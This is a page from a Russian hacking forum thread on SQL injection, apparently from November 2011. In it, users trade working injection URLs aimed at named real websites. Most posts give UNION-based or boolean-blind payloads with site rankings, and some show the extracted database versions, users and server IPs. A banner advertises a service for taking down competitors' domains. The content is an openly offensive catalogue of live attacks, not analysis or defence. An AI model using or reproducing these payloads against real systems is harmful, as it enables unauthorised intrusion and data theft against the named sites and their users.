SQL Инъекции — ANTICHAT Forum

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 1445 из 1604

1445

Опции темы

Поиск в этой теме

Опции просмотра

#14441

22.11.2011, 19:03

kallstrom

Новичок

Регистрация: 19.03.2010

Сообщений: 0

Провел на форуме:
292

Репутация: 0

Прикольные GIF-ки))

Цитата:

Сообщение от None

http://www.omfgif.com/gif.php?id=4961 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,122,99,58),IFNULL(CAST(schema_n ame AS CHAR),CHAR(32)),CHAR(58,97,119,114,58)), NULL, NULL FROM information_schema.SCHEMATA#

#14442

22.11.2011, 19:33

tabletkO

Познающий

Регистрация: 03.11.2011

Сообщений: 83

Провел на форуме:
28093

Репутация: 11

PostgreSQL

тИЦ 10

Код HTML:

http://www.24fishing.ru/fish/fish.php?id=-1+union+select+null,version(),null,null,null,null--

Result:

Код HTML:

PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

P.S. Первая скулья PostgreSQL )

----

MySQL

PR 5

Код HTML:

http://www.killarney.ie/fish.php?id=-1+union+select+1,table_name,3,4,5,6,version(),user(),database(),10,11,12,13,14,15,16+from+information_schema.tables--+

Вывод всего)

#14443

22.11.2011, 21:15

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

resi.at PR-5

Код:

http://www.resi.at/resi-nr/beitrag.php?id=-1393+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

Код:

5.1.41-3ubuntu12.10:c0resi@localhost:c0resi

*в тайтле

goonersguide.com PR-4 alexa-82k

Код:

www.goonersguide.com/read_news_item.php?newsID=-490+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11+--+

Код:

4.1.22-community-nt:pk@208.118.249.170:goonersguide

ergo-russ.com ТИЦ-650

Код:

http://www.ergo-russ.com/press-news-detail.php?news_id=-49+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4+--+

Код:

4.0.27-log:zao_rus@195.242.3.251:zao_rus

#14444

23.11.2011, 01:34

kallstrom

Новичок

Регистрация: 19.03.2010

Сообщений: 0

Провел на форуме:
292

Репутация: 0

Сайт о немецкой армии 1918-1945 гг

Цитата:

Сообщение от None

http://www.feldgrau.com/PzDiv.php?ID=2 UNION ALL SELECT NULL, CONCAT(CHAR(58,111,105,122,58),IFNULL(CAST(schema_ name AS CHAR),CHAR(32)),CHAR(58,109,101,122,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM information_schema.SCHEMATA#

PR=5

тИЦ=40

Alexa=904,998

---------------------

Что-то о запчастях к мотоциклам

Цитата:

Сообщение от None

https://www.kisantech.com/index.php?cat_id=-9792 OR NOT ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1,1),11,1)) > 97

Здесь Blind, как смог так и показал)

#14445

23.11.2011, 16:11

Drager

Новичок

Регистрация: 02.11.2011

Сообщений: 12

Провел на форуме:
2371

Репутация: 32

worstpreviews.com

[тИЦ=130]

[PR=5]

Код:

http://www.worstpreviews.com/headline.php?id=999999999+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,CONCAT_WS('-',USER(),VERSION(),DATABASE()),9,10,11+--+

alexgi_2@localhost-5.1.56-log-alexgi_worstreview

а базу форума [vBulletin™ Version 4.0.1] обнаружить не удалось. подозреваю, что она находится не на localhost... а жаль =]

#14446

23.11.2011, 21:34

kallstrom

Новичок

Регистрация: 19.03.2010

Сообщений: 0

Провел на форуме:
292

Репутация: 0

Магазин электроаппаратуры

Цитата:

Сообщение от None

http://www.vt4c.com/shop/program/main.php?group_id=2 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,1)) > 117

Boolean-based blind

PR=3

Alexa=10,414,839

#14447

23.11.2011, 22:19

OxoTnik

Постоянный

Регистрация: 10.06.2011

Сообщений: 939

Провел на форуме:
290351

Репутация: 173

Какие то четри с Москвы

Цитата:

Сообщение от None

http://www.mosoblproc.ru/news/?id=950+and+1=0+union+select+1,2,3,table_name,5,6+ from+information_schema.tables--+&print=1

#14448

24.11.2011, 00:23

stan0009

Участник форума

Регистрация: 30.07.2010

Сообщений: 118

Провел на форуме:
39063

Репутация: 0

Цитата:

Сообщение от zenon3

http://www.nfasp.org.uk/events_single.php?id=1110'
Помогите разобрать. Что то вообще не понимаю что там за фильтрация.

blind юзай

#14449

24.11.2011, 00:35

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Цитата:

Сообщение от stan0009

blind юзай

помимо той ссылки еще тут blind:

Target: http://www.nfasp.org.uk/resources_listing.php?typeid=2{blind}

База: cmsdb

#14450

24.11.2011, 00:40

kallstrom

Новичок

Регистрация: 19.03.2010

Сообщений: 0

Провел на форуме:
292

Репутация: 0

Встречайте! Эскорт-услуги по всему миру!

Цитата:

Сообщение от None

http://rome.allworldescorts.com:80/profile.php?ad_id=504&category=VIP Escorts
Place: GET
Parameter: ad_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ad_id=504' AND 6865=6865 AND 'QfsV'='QfsV&category=VIP Escorts